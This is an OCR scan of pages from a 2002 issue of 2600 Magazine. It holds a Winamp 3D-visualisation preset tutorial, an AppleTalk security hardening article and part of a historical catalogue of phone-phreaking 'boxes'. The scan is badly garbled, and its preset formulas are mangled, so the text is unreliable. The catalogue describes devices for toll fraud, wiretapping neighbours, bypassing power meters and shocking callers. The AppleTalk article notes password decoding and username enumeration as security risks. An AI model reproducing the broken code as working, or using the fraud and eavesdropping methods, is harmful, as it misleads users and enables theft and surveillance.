didn't add bis listing He probably pul his name
and address on a form somewhere, and whoosh, he
w as i n a n at i on a 1 online di rec r o ry .
Just thought I'd share this fun little story with
you.
Tf Kinks to C hi for show in# me the fan / can
have while hared and watching The Mummy Re-
turns ail day cvety day. I And III sec VeUr and
R etd Van re i n s eh oaf. f
Spring 2002
Page It
by dktboflk
diabolikt^nitric.nci
This article will explain how lo lake those
cheap '3D glasses" you gel in cereal boxes and
comic books and use them with Winamp s AVS
studio to create very realistic 3D spectrum ana-
lyzer effects and trip for days. It's pretty simple
and amazing. When it works, you can get effects
reaching about a foot to two feel out of your
screen toward you. Very nippy. The trick to
achieving a 3D effect from your monitor is a pair
of those old 3D glasses” you'd get as a kid to
turn red and blue lines into a shitty purple picture
that w&& sort of, but not {juke, 3D,
Disclaimer: You can hurt your eyes doing
this. The day after 1 figured it out, I woke up with
a pretty had headache. You can experience any-
thing from nausea to tiredness and just a plain bad
headache. If those "Magic Eye 1 things weren't
for you, don't attempt this Use a’ your own risk
it's non my fault. Don’t blame rue.
What You Will Need
A computer. (Actually, although it’s not that
ijiren.se graphically, you should have a, pretty
good video card, 1 he higher the frame rate, the
nicer this effect looks. More importantly a low
resolution will force the spectrum analyzers to
cancel each other out more often and will m.stdl w
distorted pictures.)
A pair tfj 3D glasses. (These ;ire the ones with
a piece of red cellophane on one eye and blue cel-
lophane on the other. The ones I'm using have red
over the left eye and blue over the Eight. If yours
are n l the sanies we ar T h e m bae k w aids i > r mod my
code.)
WinAMP with /H\V studio, (These are what I
wrote the '3D mod" presets in,) You'll want to be
fullscreening these effects at 640x480, although
yesterday l was ICQing white I had a portion of
my monitor displaying the AVS and the effect
was uobceable- it hurt a lot mote, too.
Booming techno always helps. Aphex Iwim
Clint Mansell.,, whatever floats your boat.
How to Make the Presets
You can download tire presets from
hllp;//d)nsinik7.hypermart.nel/ T but 1 strongly
suggest writing your own. The AVS presets I
wrote art si triple spectrum analyzers, a blue ana-
lyzer with a red analyzer offset to the right of the
blue, The more the Iw'o are offset, the closer to
your eyes they appear, in Winamp V AVS Studio,
the x and y coordinates of the screen begin at -1
and end at ft to matter what the resolution is. In
order to make the analyzers appear to be bulging
out of the screen, the offset between the red and
blue analyzers (I’ll just refer to this as the offset
from mwv on) must vary, A good value for the off-
set l found was c * e o s( 2 * y ) +0 . (75 for vertical
si ope s and c *e o^( 2 * x )+4 ) 05 tot h ori zo ntal sh >pes .
where c is a value of from 0.05 to 0,2, (Note:
these values work well for a 14" monitor at about
two feet away. You may have to modify this range
in order to suit your setup.) Since the scopes are
offset horizontally, it is easier to see a vertical
scope in 3D because the two scopes will cancel
each other out less - this is where a higher resolu-
tion comes into play. The higher the detail of the
scopes, the less one scope will overwrite its com-
panions position, and the better looking this result,
To make a throbbing vertical scope, try the
follow mg
ft Open the AVS Studio, (Stan the vi«ualizsi|
tion and double dick in the window. ) Make a new
preset.
2. Add a tmns/fade ( + -> irans -> fadeouO. Set
it to be fast enough you can slow it later if you i
like the effect. Personally I just click on "Main"
and check off ’“clear every frame" so the effect is i
as clean as possible.
3, Add a Superscope (+ -> render -> Super-
scope J wjth (he following settings:
I nit: it =40; t~0; tv -0.1 pit = I;
Per frame: t—t^0.9+ivH 1 1 ;
Per Point:
\ = f + \ *(p<n\-\ sini rfti / 4 (59), f }/?.}+ \ 0. 0A : S ‘os (2 J
) ) ; v ■= f *2 - V . 0; x - v * L5- (l 09
Check off "Waveform”, ' Center 11 , and I
"Lines 11 . Although you can modify those as you j
wish, that’s just what I suggest. This will be the
blue scope. To accurately choose your color, see
"Calibrating Your Preset' 1 below
Click the \2" button to copy this Superscope.
Modify this one to have the following settings;
I nil: n=40: t-0; fv—0 , f;dt= l ;
On Beat: c ~ Urandf fOOy/OO ) *9. D8)+9. #7;
Per f rame: t-f*Q.9+t\' * 0 . 1 ;l - c * 9;
Per Point:
■i—i + 1 ■ j rfsjnf i *3, 14159ft if 2 ) +fc ?s ( 3 1! y,ft
+0.05; v— 1*2- LO; jr— X' * L 5-0 09,
This is only slightly more complex than a flat
surfaced (in 3-space) scope. When the On Beat
function is run, the offset between the two scopes
is randomized between 0,07 and 0.15, Every
frame, the offset is reduced to 90 percent of its
previous value (the scope appears io shrink back
towards the screen). Although Win amp Y, beat de l
Page 12
2600 Magazine
lection isn't that great., during good house music
or anything with good bass, you will definitely
"see" the effect, You can get another neat effect
hy making two sets of scopes - one vertical one
horizontal - and have them come out of the screen
On Beat random amounts, with or without decay.
To make a .ID horizontal scope, 1 use the follow-
ing settings for each scope:
Blue 1 Scope:
frtit: n=40: t-0 ; tv-0.1 ;dt-i :
Per Frame: t=-t*&.9+l v *0, /
Pe r Point: v = / - + r *ipo u -t s in(i *3. / 4. / 5 9 j, / J Z2 j ;
x '—i*2-i.0+(0.03*t tost _ Tv ) ) ;
v=v^7.5;
Red Set ipe;
fnii: n-40; t=V; tv-Q.l;di= /;
On Bern: c-((mnd( I(Xp/JO0yd).O7)+0m:
Per Fra m e: t-tHhd+tv *0. 1 ;e= c * 9 ; ( rh is wot* id
be i a decoy the scope hark i o the screen, other-
wise remove the kilter equation}
Per Point: y~t+ v^(pow(sin{ 14159), I )/2);
v — i *2- f A)+(c A :m( 2 A j ) + 0, 05 :
y-y*1.5;
Another interesting effect you cou fd try would
be to change cos(2*x) to abs(eos(4*3. 14159" x}),
F his would make two 3D ripples in the analyzer.
Instead of just coming out once, it would come
out. go back in, out and in again,
What Can't 1 Do to the Presets?
I strongly recommend you make your own -
mine are just working guides. You probably can
do a lot better if you’ve ever made Winamp A VS
settings before - until this project i never tried.
However, don't think that you will throw some
crazy blur effect into the mix and it will be even
more trippy. For this effect to work, the blue pixel
must be immediately offset to the left of the red
pixel for vout eyes to combine them into a single
U) point, I've found to get the most effective 3D
effect, keep your presets clean Whatever effects
you do attempt to add, keep in mind T if the red
and blue lines cross (this is a reference to a verti-
cal scope - in a horizontal scope, they will cross
all the time), you will lose the 3D effect immedi-
ately.
It would be really interesting lo gei a dot-
plane working with this effect, but unfortunately
I 've found that there are far too many dots at most
angles to not have one dot plane overlap a large
portion of the other. You could do this by writing
an AVS plugin in C++, but lhai is outside I he
scope of this article.
What Can 1 Do with the Presets?
Noting the limitations above, you can have
some damn cool effects. The most noticeable
thing you can do is modify "c" in the formula dy-
namically, Win AM P's AVS Studio contains the
ability to do "On Beat” modifications to your vari-
ables.
Calibrating Your Preset
To get the best 3D effect, you warn the bright-
est color of red that still appears dark to I he eye
seeing through the blue cellophane, and vice
versa. To lind the right shade of blue, double dick
on rhe blue bar near the bottom-right of the win-
dow. Pm on your glasses. Close your right eye.
Choose a shade of blue that appears dark to your
left eye. Yon should now be looking at the lighl-
to-dark blue vertical gradient near the bottom
right of the color selector through the red cello-
phane. Move the brightness selector upwards as
high as it goes while it still appears black, or near
black. J’his will make the color as noticeable as
possible to your righl eye while still appearing us
nothing to your left eye. Click okay, and calibrate
the second ,r Render/S uperscope" color by doing
the opposite of what you did for the first. II when
looking at the presets through the glasses you can
see w hat almost looks like shadows of the scopes
on the screen itself, try darkening the chosen
shades of blue and red.
Other Ideas with the Glasses
Obviously, Win AMP AVS modules are just
one idea for these glasses. With basic VB skill/
one could write 3D wire framing modules or a
staiiield generator in pseudo- 3D* Of course,
you’re limited to the color of purple, but consid-
ering you’ve paid about a dollar nr less for these
you shouldn't really complain. One suggestion
I’ve had from a friend was to make an hour-long
mix ta pc. export the whole thing to VMS and bring
the tape, 20 pairs of I he glasses, and a lot of
booze/ weed/ cough syrup/ whatever to a party and
have a nice massive trip.
Conclusion
Well, when it works, it works well. If you
can't gel your crazy ass preset to work on the first
try, attempt to simplify h I've found it's a lot
easier to see two scopes than one. but three or
more need a warm up of simpler effects, Other
things you can try arc shifting your head from
side to side - this helps you really see (he effect
I’ve found. 11 you have loo many scopes (four in-
stead of two), try changing the distance or angle
you re viewing. Just experiment, half the fun’s
just seeing what you can come up with. Then
again a good chunk of it is staying up til 4 am
coaxing some cough syrup listening to Aphex
Twin in headphones,
Greetz: FiackCanada. argv, cl ox, the other
members of Priapism, Jaiden Knight, all my local
friends - you know who you ore.
¥
Spring 2002
Page 13
by Steven Krtuzer
s k reu zer @ mac .com
By most accounts, Apple clients and servers
make up a small portion of the types of systems on
any given network. However. Apple hardware and
software have carved out a niche in certain areas
such as design and multimedia along with the ed-
ueational See Id. AppleTalk networks Jo exist. It is
just that hackers and system administrators lend to
overlook them. In mixed environments, the net
work managers tend to be highly proficient with
Unix or Windows NT but don't know, or care to
know, about how AppleTalk networks actually
work. They will take the minimum steps neces-
sary to ensure that Apple clients can connect to
network resources and once that is complete all is
well and good. However, this lack of understand-
ing can be used as a possible entry point into your
network. This article was written using a Power
Macintosh G4 running OS 9J.2 and a dual
processor Power Macintosh G4 running OS 9.1
and AppleShare IP 6.3. 3. It w .tl address potential
security holes and what you can do to harden both
the client and server side of an AppleTalk network
We will start off by examining the client side
undo a c of t he mos t comm on prob lent x wh ic h ;d so
plagues other network protocols as well. Older
Macintosh clients connecting to servers will send
their password in dear text across the network, ft
is also possible that the server will force the client
to send their password as clear text if it does not
support other authentication algorithms, (Win-
dows 2000 with AppleTalk support will do this.)
This is one; of the easiest problems to fix. and you
have two very good solutions at hand. The first is
to download an updated version of the AppleShare
client that is available at h Up:// www. apple.-
com/u p pi eshare i p/ te x t/dow n 1 car Isditml. The sec-
ond solution is a little more complex, ff you open
the AppleShare client in Res Edit and locate the
"FSMNT resource you will sec a sub-resource la-
beled "ApShare Mounter 11 , Open up that resource
and do a search in ASCII for "Cleartxf 1 , Once
found, replace the "C” in "Clean xr" with any other
letter. Once that is complete, do the same tor the
"ApShare ExFS” in the ,H EXFS" resource. Once
that is complete, save your changes and move the
file back into the extensions folder on the clieni
machine S his will prevent the user from sending
their password in clear text.
Another problem is allowing users to save
then login name and password. This creates an
alias to the file server located in the "Servers"
folder m y 5 te m‘™l3erAW^ n (fie rn a c hi he
boots up. it will rnouni all file servers, listed in that
folder. This can become a problem if an attacker
has physical access to a client machine. It. is possi
ble lo modify the AppleShare client so that the
"Save my name and password" feature is disabled.
A patch for that is available at
http://htmiepage.mac.com/sfc reuzer.
The last problem I will address on the client
side is personal file sharing. Every Mac OS since
version 7.0 has the ability to allow the end user to
share his or her hard drive and allow remote con-
nections. Most of the time when a person enables
fi/c sharing they don't assign a password lo the
system owner, thus allowing remote logins with
full read and w rite privileges to the entire bard
drive. Or a person will share the entire hard drive
rather then make share points and give regular
users read and write privileges to the whole hard
drive, including the system folder. This will allow
an all acker access to vital system resources and
also exposes filings like preference files w hich can
contain passwords used by different applications.
It would also be possible to install a trojan or virus
that will execute upon next startup by placing the
file in the Startup hems' folder. An attacker with
malicious intent could erase certain parts of the
hard drive, or the entire hard drive. To prevent this
from occurring, you can remove the "Fife Sharing
Extension 1 ' from the extensions folder in the sys-
tem folder, Tliis will remove the ability to start
personal hie sharing.
On both AppleShare IP servers and Macintosh
workstations running personal file sharing store
usernames, passwords and group data in a hie
called "Users and Groups Data File" which is lo-
cated in (he preferences folder of the system
folder. The encryption algorithm is ven simple
and it is possible to decode passwords stored in
this file. AppleShare IP does not allow you to
share the system folder, so unless an attacker had
physical access to the server or was able to exe-
cute a trojan on the server side, you should not
have to worry about the trivial encoding scheme
used, maefspwete, the Unix utility to decode the
password is available from http://happine.ss-
.dhs . t >rg/sofiw are/ i n acts pwd/ mac fspwd ,c +
The perceived simplicity of AppleShare IP
(A5IP) makes it appealing to novice administra-
tors who typically have little appreciation for se-
curity. Out of the box, AS/P is very secure btrt
certain steps can be taken to harden the out of the
box configuration. One of the biggest drawbacks
Page 14
2600 Magazine
of AS IP is its inability to keep access Jogs. (The
web am! mail server do log activity, but rile shar-
ing does not.) It is possible to get a list of users
currently connected to the server, the connection
method, and when they logged on, but this data is
not written to any tile so once they log off, all this
information is lost.
A SIP makes the enumeration of valid ii^er
names a trivia! task due to the fact that security
was sacrificed for ease of use. When you use the
AppleShare client to log onto a server, the return
result from the server can be used to brute force
valid usernames. When an invalid username ts en-
tered, the server responds w ith a kOAMErrMem-
lierObjectNotFpund (error n29312) which
translates to "Unknown user, invalid password or
the Login is disabled,,..'', but when a valid user-
name with an invalid password is sent, the server
respon ds with k O A M Err Yu the n heal i oriError (er
ror n 29360 ) which translates to "Horry, the pass,
word you entered is incorrect.,," With this it
would be possible to write a script to read in user
names from a tile and mimic the login process and
parse the result to brute force enumerate valid
usernames. To protect yourself against this, make
sure that the server disables accounts after multi-
ple tailed login attempts. With dws feature and a
secure user password in place, brute forcing be-
comes much more difficult, if not impossible The
drawback is that ASfPonly allows you to config-
ure the minimum characters in a password You
are unable to force a user to mis numbers and let-
ters, and you are unable to "blacklist" certain
words like "password".
The final topic I will address in this article is
related to user authentication The algorithms for
all of the AppleShare authentication methods are
public. Tile most widely used authentication
method b 2 Way randnum that sends two S byte
l)HS encrypted random numbers over the net-
work From a computational standpoint the algo-
rithm is exactly as strong as 56-bit l>ES and it has
a password length HmvV of eight characters. It is
vulnerable to an offline password guessing attack
similar to running crack against n Unix passwd
tile, Apple has developed a new authentication
method that addresses the weaknesses of 2 Way
randnum. called DHX. DHX uses Piffle Heilman
key exchange to create a 128-bit session kev and
then, sends a 64 -character password to the server
encrypted with CAST 128 Its strength is approxi-
mately equivalent to 128-bil SSL.
> have only scratched the surface of the numer-
ous potential vulnerabilities of AppleTalk net-
works. In reality, on a well- con figured AppleTalk
network, it can be incredibly difficulty to bypass
security. Lot certain voo Is and techniques can cre-
ate access paths into your systems. I hope this arti
de has sparked an interest, and system
administrators will take a closer look at their net-
works.
by Elf Qrin
i w w w.ElfQrinxom )
Traditionally in the phreuker culture, any de-
vice thought to be connected to a phone line is
called a "box" and is named after a color since (he
first "blue box" invented by Captain Crunch, the
father of the phreak scene. Since all colors were
quickly used for this purpose, other fanciful names
began to be used to name boxes.
Eve tried to make a definitive list of all the
known "color boxes" with a brief description of
each.
I’ve done a lot of research to find and classify
the m a I ! . re a d i ng th mu g h a bo u 1 3( K) doe u i nen t s . I n
most eases I've used quotes from the original doc-
uments for the descriptions.
Since most boxes were invented in the ‘80s or
early ‘90s, this article is mainly meant for infor-
mative and historical purposes. Many of these
boxes don't work nowadays, (Some may never
have worked at all,} However, some still do. And
sometimes similar models can even be found in
stores,
I've catalogued 94 phreak boxes of 75 differ- !
ent kinds (counting only boxes with different
functions), and 17 aliases (same box with a differ-
ent name),
I’ve also included live non-phreak boxes o|
four different kinds {boxes not meant to be
plugged i litre rfre phone hue - they're meant for use
with the eleefrk Ime or soincfhing.el.se).
The raw mtal iff 99 boxes of 7 Vf kinds and 17
aliases, which adds up to 1 16 box names.
When the name of a box is included between
paremhesevThe box name is actually just an alias
of another box.
When the name gj a pox is included between
square brackets',, the box has been created or rein-
vented by someone else using a different scheme :
and/or different components.
When lhere Y s one box that uses the name of an I
already existing box (supposedly because the au I
thor was unaware of ]\ Eve added to it a sequen-
tial number between parentheses, such as (2). (3), ;
etc.
Spring 2002
Page 15
(2600 Bo x) (another name for the Blue Box).
See Blue Box.
A cry lie Box (aka Extended Bud Box). The
purpose of this box is to get Three- Wav Calling.
Call Waning, programmable Call Forwarding. and
an easier way of extended Bud Boxing, stealing
them from the fortunate ones on your block, Cre-
ated by The Pimp,
ALF Box. A tone generator for the Apple lie
with an ALT Music Synthesizer Card. Created by
Sir Briggs of the SouthCemra] Discount Ware-
meisters (SCDW)oi' Texas.
Aqua Bow Every true phreaker lives m fear of
the dreaded EBJ, Lock in Trace/ Lor a long
time, it was impossible to escape from lire lock in
trace. This box offers, an "escape route" by lower-
ing the voltage on the phone line. Concept by Cap-
tain Xero x . PI arts by : The T ra velcr,
Assassin Box (sometimes misspelled as As-
sasin Box. Asassin Box, Asasin Box). A box de-
signed to scare, harm, or kill people at the phone
h\ a shock of electricity right in the car as soon as
the victim starts dialing u number Dris box was
designed, because its authors, after trying a Day-
Glo Box for some weeks "were bored and decided
to move on to telephone terrorism " Linked by
Grim Reaper.
[Beagan Box! (sometimes misspelled us Be-
gan Box i [similar to Beige Box, Beige Box Revis-
ited, Day-Glo Box j Sec Beige Box. Concept and
Design; Black Box Bela Testing: Lord Reagan.
Beige Box /similar Jo Beagan Box. Beige Box
Revisited. Bud Box, Day-Glo Box], A homemade
lineman’s handset, also known as REMOBS (RE-
Mote OB serving Systems) With a Beige Box you
can do the following things: "Eavesdropping; long
distance, static- free free tone calls to phriends; di-
aling direct to Alliance Conferencing (also static-
free); phuking up people; bothering the operator at
little risk to yourself; blue boxing with a greatly
reduced chance of getting caught;, anything a I all
that you want, since you are an extension on lhai
line." Invented by The Exterminator and Fhe Ter-
minal Man, Date: Friday, May 17, 1985.
{Beige Box Revisited ( [similar to Beagan Box.
Beige Box. Day-Glo ftuxj. See Beige Box. By
Mercenary. Yean 1 992 or later.
Black Box , A Black Box is a device that is
hooked up to your tone lhai fixes is so that when
you get a call, the caller doesn't get charged for the
call This is good for calls up to a half hour. After
that the tone company gets suspicious, and then
you can guess what happens. The original box was
created in the USA There are modified versions
for other countries. Original author unknown. 1 1 K
Black Box by K.S. Reach of The Hackers Acad-
cun (March 1988). Greek Black Box by Fabulist
and Enigma (year 1992),
Blast Box , All a Blast Box is is a really cheap
amplifier (around five walls or so) connected in
place of the microphone on your telephone meant
to talk to someone on the phone who just doesn't
shut up.
Blast Box H. Similar to ihe Blast Box, but de-
signed to blow up other people’s computers, in-
stead of their ears.
Bleeper Box [UK version of the Blue Box],
fhe United Kingdom's own version of the Blue
Box, modi lied to work with the UK/s phone sys-
tem. Based on the same principles. However,
British Telecom uses two sets of frequencies, for-
ward and backward
Blotto Box. For years now every pirate has
dreamed of the Blotto Box. It w as at first made as
a joke to mock more ignorant people into thinking
that the function of ii actually was possible. This
box quite simply, can turn off the phone lines
everywhere. Originally conceived by King Blotto.
Created b> The Traveler,
Blue Box (aka 2600 Box). I he mother of all
boxes. The lirst box in history which started the
whole ph making scene. Invented by John Draper
(Lika ’C aptu i n On nc h " ,1 in t he va ri y 60 ‘s, w ho dr s- ,
covered that by sending a tone of 2600H / over the
telephone lines ot AT&T, it was possible to make
free calls. In the 1960’s, the makers of CapTi
Crunch breakfast cereal offered a toy-w histle prize
in every box as a treat for the Cap'll Crunch set,
Somehow John Draper (who called himself "Cap-
tain Crunch" since then) discovered that the toy
whistle just happened to produce a perfect 2600-
cycle tone. Discovered by Captain Crunch (John
Draper). Year: early 1960's,
(Blue Coo Box) t short name for the Blue Con-
ference Box). See Blue Conference Box.
Blue Conference Box (aka Blue Con Box), A
Blue Box and a Con Box combined.
Bottle -Nosed Gray Box | Selective version of
the Rainbow Box}. This box will do damage to
only your phone, the line between you and your
enemy, and your enemy’s modem, whereas the
Rainbow Box just takes everything out. By The
Dolphin that came from Belmont.
[ Brown Boxj (aka Opaque Box) [similar to
Con Box, Party Box. Three Box]. Created by The
Doc,
Bud Box . This box is quite similar to a Beige
Box. except this is a portable unit. It is extremely
handy for free voice calls and tapping a nearby
house’ s line. Invented by Dr. D-Code and Lire
Pimp of The Slaughtered Chic ken.
Busy Box. This box is attached to the outside
of the person's house in their telephone box. It
makes it so that when any phone inside (hat house
is picked up, no dial tone is heard and no calls can
be received or sent. This is good for lame BBS's as
they tend not to call out much, and it will remain
undetected for a longer period of time. I nvented by
Black Death.
Charging Box (aka Light Box), 'his box is
used to indicate when a call is being charged for
and when it is not. Once installed, the box has two
lights, Lt green one and a red one. Green means free
and red shows that you arc being charged. Created
Page 16
2600 Magazine
by Stinky Pig Productions (a LI team}
( Chart ft ox) (short name for the Chartreuse
Box )* See Chartreuse Box.
Chartreuse Box (aka Chart Box, Obnoxious
Box). Your telephone line is a constant power
source. This box is designed to allow you to tap
that power source and give you up to 12 volts
(more if you use a transformer). Created by
Wonko The Sane.
Cheese Box; This box (named for the type of
box the lirst one was found in) turns your home
phone into a pay phone. It cm be used together
with a Red Box to make free calls. Created by
Otho Radix (?}.
Chrome Box. A portable self-contained device
to manipulate traffic signals. Not a phreak box
Created by Remote Control Date; June 14 1988.
Clear Box. This box works on 11 post -pay " pay
phones (a kind of payphone that could he found in
Canada and in rural United Slates). hi other words,
those phones that don’t require payment until after
the connection has been e&tebfvshed. If you don't
deposit money, you can't speak to the person at the
oilier end, because your mouthpiece is cut off - hut
not your earpiece. (Yes, you can make free culls to
the weather, etc. from such phones.) With this box
the user is able to speak to the other person for
free. The clear box thus "clears" up the problem of
not being heard. Author: Mr Trench of 2600.
Originally published hi the July 1984 issue of
2600 .
Cold Box. Usage unknown. Cited in the Blotto
Box document. Created by The Traveler,
Con Box (aka Conference Box) [similar to
Brown Box. Party Box. Three Box). This box al-
lows you to connect two lines in your house to
g i ve Th rec-Way t y pe sc r v ice. c real mg a party line.
(Conference Box) (expanded name for the
Con Box). See Con Box.
Copper Box. Uses cross- talk feedback to try to
' damage sensitive equipment of a phone company.
More a method than a real box. Conceived bv The
Cypher. Year I486,
Crimson Box (sometimes misspelled as
Chrirmon Box) [ similar to Green Box (2), Orange
Box, Hold Box. Hold On Box, White Box (2). Ycl-
low Box 0)1 This box is a very simple device that
will allow you to pul someone on hold or make
your phone busy with a large amount of ease. You
11 ip a switch and the person can't hear you talking.
Rip it back and everything is peachy. U doesn’t
have a LTD to show when hold mode is on. Cre-
ated by Or. O-Code. Year. 1985.
Dark Box. Multi-Purpose Network Manipula-
tion Unit This box’s basic design allows you to
call any where on earth without fear of being billed
or traced. Created by Cablecast Operator of the
Dark Side Research Group. Year: 1987.
(Day-Glo Box I {aka Day do Box ) [similar to
Beige Box] This box lets you place calls for free
With no time limit, no possibility of a wiretap, and
the culls can be placed from anywhere in the
world. Conceptualized by John F. Kennedy.
Divert! Box. Cited in the B lotto Box docu-
ment. Probably used to divert u phone call. Cre-
ated hy The Traveler.
Dior Box , Cal Receive on two lines with the
option to conference them. By The Park Lords of
Chaos: Prowler. Apprentice. Pro Hack, Zeus,
Tarkmelh. Blacksioke, Lazer. Date: October. 3
1988.
DMA Box. Not actually a box hut a project of
die Outlaw Telecom mandos to hack cellular
phones in the early era of those devices ( 1989). Is-
sued in February 1989.
(Extended Bad Box ) (another name for the
Acrylic Box). See Aery tie Box.
fuzz This box duplicates the tones of
coins dropping down the phone chute, thereby al-
lowing the user to place calls without paying for
them.
Gold Box [similar to X-GokJ Box]. When you
put a gold box on two phone lines it lets anyone
who calls one of the lines call can on the other So
when the phone company traces the line it will tell
them that you're calling from the line you hooked
the gold box up to. By Dr. Revenge, cosysop of
Modem Madness (5 lb).
Grab Box. This box uses inductive coupling to
join with any radio that uses a coil for an antenna
(such as an AM. longwave, or shortwave radio)
and allows you to lengthen it considerably Not a
p break box. This kind of box can be commonly
Found in an electronic shop. By Shadow spawn.
Green Box. This box generates tones for Coin
Collection in Return, and Ringbaek U must be
used by the CALI TP party,
(Green Box (2)j | similar to Crimson Box. Or-
ange Box, Hold Box, Hold On Box, White Box
(2), Yello w Bo x ( 2 ) j , A h old hu tt on , S ee Cri m son
Box.
(Gray Box) (another name for the Silver Box).
Sec Silver Box
{Hold Boxj [similar to Crimson Box, Green I
Box r2). Orange Box, Hold On Box. White Box
(2), Yellow Box (2)]. A hold button. Sec Crimson
Box,
/ Hold On Box} [similar to Crimson Box,
Green Box ( 2). Orange Box. Hold Box. White Box
(2). Yellow Box (2)|. A hold button. See Crimson
Box.
Infinity Box ( sometimes misspelled as Inliity
Box). When the plume number of a tele phone con-
taining an infinity box device is dialed and a cer-
tain note is blown into the phone from a Hohner
Key of C harmonica, the bugged phone does not
ring and, what's more, enables the caller to then
hear everything said in the room that the phone is
located in. As long as the caller wants to stay on
(he phone, all is open to him or her. If the phone is ,
lifted off vhe book, the transmitter is disconnected
and the "bugged’ 1 party receives a dial tone as if
nothing was wrong with the line Description by
Iron Man of The Crack Shop From the original
Spring 2002
Page 17
'“Infinity Transmitter" hy Manny Mi tile man.
In-Use Light Box, A device that signals
whether or not an extension of a particular phone
line is off-hook. It does mtl indicate whether or not
a phone is being tapped, and will light whenever
any extension is picked up. By The Night Owl AE.
Jack Box. A device to generate tones created
starling from a phone keypad.
Jolly Box . Software written in 8086 assembly
which generates several phone tones i "Multi-Fre-
q tien / -Demon- Dialer for Global Access"). Code
by Jolly Roger. Updated by Zaphod Beeblebrox of
Control Team. Date: probably 1993 or earlier.
(Light Box ) (another name for the Charging
Box). See Charging Box
I M ud Box . Makes your voice louder over the
phone line. Especially meant foi use in conference
calls. Designed, written and built by Mr. Bill.
Lunch Box (aka Tap Box), The Lunch Box is a
very simple transmitter used for eavesdropping. It
is quite small and cm easily be put in a number of
places, Created by Dr. D-Code
Magenta Box. When you call up line one from
your house, you will gel a dial tone almost imme-
diately. Using DTML you can dial anywhere that
the person who owns line two has service to.
Which means you can direct dial Alliance, Aus-
tralia, and your favorite BBS far free. Designed by
Street f ighter.
Magenta Box (2), A portable ringing generator
which, if connected to a phone me, will make the
phone on the end of it ring. It works by using a re-
lay as a vibrator to generate AC which is then
stepped up by a transformer and led through a ca-
pacitor into the phone line to make the phone ring.
Mauve Box . Generates a magnetic held to lap
the nearest phone conversation (somehow similar
to Tempest, the system to tap video screens). Cre-
ated by Captain Generic with help from The Ge-
netic Mishap. Date: November, 24 1986- 19:08.
Meeko Box. A multi-purpose box with the fol-
lowing features; It is able to record telephone con-
versations with excellent quality. It is able to play
8 source directly into rhe phone line. It can keep
die phone line open. You can box without using a
phone, and headphones {requires a modem). De-
signed by Meeko of Hi-ReS UK. Year: 1994,
Mega Box. A cable re router to hook up a sec-
ond line in youi house.
Modu Box (aka Modu] a Box), A second phone
plug attached to an existing one. Designed by
Magnus Adept .
(Modulo Box) (expanded name for the Modu
Box). See Moduki Box.
(Music Box] [similar to Pink Box < 2)1* It s ba-
sically a Pink Box (2) without the LED. See Pink
Box (2). Created by Aluminium Gerbul.
Mute Box. This box lets the user receive long
distance calls without being detected,
Neon Box (aka Record-o-Box) (erroneously
used as an alias tor the Bias! Box li) |simr!ar to
Sound Blaster Box, Rock Box, Slug Box], A de-
vice that adds a normal jack interface to a tele-
phone, allowing the sending of music or tones into
the phone line, or the recording of conversations
using the microphone input of a recorder. This
kind of box can be common! v found in a phone
shop,
Noise Box [similar to the Scarlet Box], It is a
device you can attach to a victim’s phone line so
that an abnormal amount ot noise will be present
on the line at all times, which would make data
transmissions almost impossible and voice com-
munications annoying, to say the least. By Doctor
Dissector of Phortune 500,
(Obnoxious Box) (another name for die Char-
treuse Box). See Chartreuse Box.
Olive Box . An alternative ring lor your phone
with a light that a ho flashes when the phone rings.
By Arnold, sysop of Hobbit Hole AE (HHAE)
East Branch,
(Opaque Box ) (another name for the Brown
Box). .See Brown Box.
/ Orange Box / fsimiia r it > C e i m son B o \ , G ree n
Box (2). Hold Box, Hold On Box. White Box (2k
Yellow Box (2 )1, A hold button See Crimson Box.
Paisley Box. A multipurpose box that com-
bines the functions of several boxes, including
blue, beige, and blotto. Among other things can
seize operator lines and remotely control all TSPS
and TOPS consoles, By Blade of the Neon I ■ tic ken
Knights.
Pandora Box „ A device that generates a high
intensity sound to produce pain. A similar device
(usually called "phasor") is commonly sold in se-
curity shops for personal defense. By Du Rat of
Rat Labs, S.F., C A. Year: 1986.
(Party Box] | similar to Brown Box, Three
Box, Con Box |. This box allows free I hree-Way
calling, connects two phone conversations at once*
without any static or excess wiring, or even having
two phone lines. Created by Grey haw ke of The
Dark Knights {TDK),
Pearl Box f similar to Pearl Box 2 - Advanced
Pearl Box]. This is a box that may substitute for
many boxes which produce tones in hertz, The
Pearl Box when operated correctly can produce
tones from 1 -9999Hz, As you can see, 2600, 1633*
1336, and other crucial tones are obviously in its
sound spectrum (yet you’d need two Pearl Boxes
to generate combined tones, such as the ones of
the dial pad), Created bv Dr, (3-Code. Year: before
1989.
/ Pearl Box 2 - Advanced Pearl Box] {similar
to Pearl Boxj. A Pearl Box made in an easier and
cheaper way. Created and Tested by D (spate r.
Date: July 1 1989.
Pink Box. Allows you to hook two separate
phone lines together to have Three-Way calling
with hold on either line, as well as bringing a dial
tone into the conversation with someone and al-
lowing them to dial the number with touch tones
so il will connect Three-Way, When they hang up,
ii wilt disconnect Three-Way calling. No more
Page IS
2600 Magazine
need to play with the hook for Three-Way.
Pink Box ( 2 ) [similar to Music Box]. The
function of a "Pink Box is to add hold button that
allows music or anything else to be played into the
telephone while the. person is on hold. This ruodifi
cation can either be done right in the telephone or
as a separate box. This kind of box can be com-
monly found in a phone shop,
Plaid Box . Turns a pulse phone line into a
touch phone capable line.
(Portable Gray Box) (another name for the
Gray Box;, See Portable Silver Box.
Portable Silver Box (aka Portable Gray Boxy
A bmteries -operated Silver Box that can lit in a
pocket for use in payphones or wherever. By The
Phone Phantom.
(Power Box] f similar to I ron Box], The power
bos is a simple device that will allow you to com-
pletely bypass the meter- reading equipment of the
power company l( works by connecting the power
line running into your house directly instead of
through (he meter {which records electricity usage
tor <he power company). When implemented cor
reedy, there is no possible way that you can he de-
tected by the power company and therefore save
many hundreds of dollars through its use. Not a
p break box Concept and Plans hv Cursoi Date:
August 9 1990.
Puce Box . This box emits vaporous LSD l ine
noise may cause strychnine formal ion
Purple Box, This box allows switching be-
tween two phone lines- putting one of them on
hold. A LED shows which line is on hold. Created
by The Flash. Date: February 26 1986.
Rainbow Box [non selective version of I he
Bottle-Nosed Gray box [* Connects the electric line
to die phone line blowing up every thing. Odds are
you will take out every phone in the neighborhood
and get caught. By The Dolphin that came from
Belmont.
Razz Box . This box allows you to tap your
neighbor's line without your neighbor knowing it.
You can also make free phone calls. Written by
The Razz and released by The Magnet of Crime
Ring International. Date: November 12 1988.
{ R e cord-o- Box) (another name for the Neon
Box ). Sec Neon Box
Red Box [similar to the Red Box Whistle] The
Red Box basically simulates the sounds of coins
